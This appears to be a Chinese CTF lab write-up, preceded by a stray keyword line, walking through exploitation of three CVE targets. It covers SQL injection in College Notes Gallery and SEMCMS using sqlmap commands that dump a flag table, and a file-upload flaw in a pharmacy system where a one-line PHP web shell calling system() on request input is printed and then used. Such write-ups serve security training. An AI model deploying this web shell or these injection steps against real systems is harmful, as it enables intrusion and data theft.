jsp做的零食网站下载,网络架构必须满足哪些特性,网站建设赵玉敏,公司注册查询系统CVE-2023-7130
靶标介绍#xff1a;
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序#xff0c;访问或修改数据.
已经告诉你在哪里存在sql注入了#xff0c;一般上来应该先目录扫…
CVE-2023-7130
靶标介绍
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序访问或修改数据.
已经告诉你在哪里存在sql注入了一般上来应该先目录扫描再进行判断看是否存在sql注入这里就直接进行注入
抓包 保存到5.txt中
sqlmap -r 5.txt --batch --dbs sqlmap -r 5.txt --batch -D notes --tables sqlmap -r 5.txt -batch -D notes -T flllaaaag --columns sqlmap -r 5.txt -batch -D notes -T flllaaaag -C flag --dump CVE-2023-48864
靶标介绍
SEMCMS是一套支持多种语言的外贸网站内容管理系统CMS。SEMCMS v4.8版本存在安全漏洞该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞。
存在sql注入
进行目录扫描
dirsearch -u http:// -e* 一一访问后来到install/安装导向 127.0.0.1
semcms
root
root
安装后会来到日志页面 日志里面有后台地址登录账号和密码
登录 在产品管理页面随便勾选选择批量上架抓包保存为5.txt 经过测试后发现参数languageID并不是注入点后面的AID才是注入的点 存在时间盲注注入点是参数AID 有这四个数据库爆semcms数据库得表 可以看到flllaaaag表 得到 CVE-2022-30887
靶标介绍
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞进而导致任意代码执行。 目录扫描后什么都没有
判断应该是需要登录进去但是邮箱不容易爆破发现最底下Mayurik可以点击访问 当在最下面点击那些下载按钮后会访问接着会弹出一个邮箱 mayuri.infospacegmail.com
密码尝试mayurik成功登录进去
找到上传界面上传一句话木马 上传成功 访问该网页后返回config.php页面 说明上传成功且可以执行
连接蚁剑 连接后全是木马文件,还是不死马点击一下就复制一份
正常情况下是可以直接访问flag的
尝试官方的POC POC 上传的木马内容
?php if($_REQUEST[s]) { system($_REQUEST[s]); } else phpinfo(); ? 上传成功 进行get传参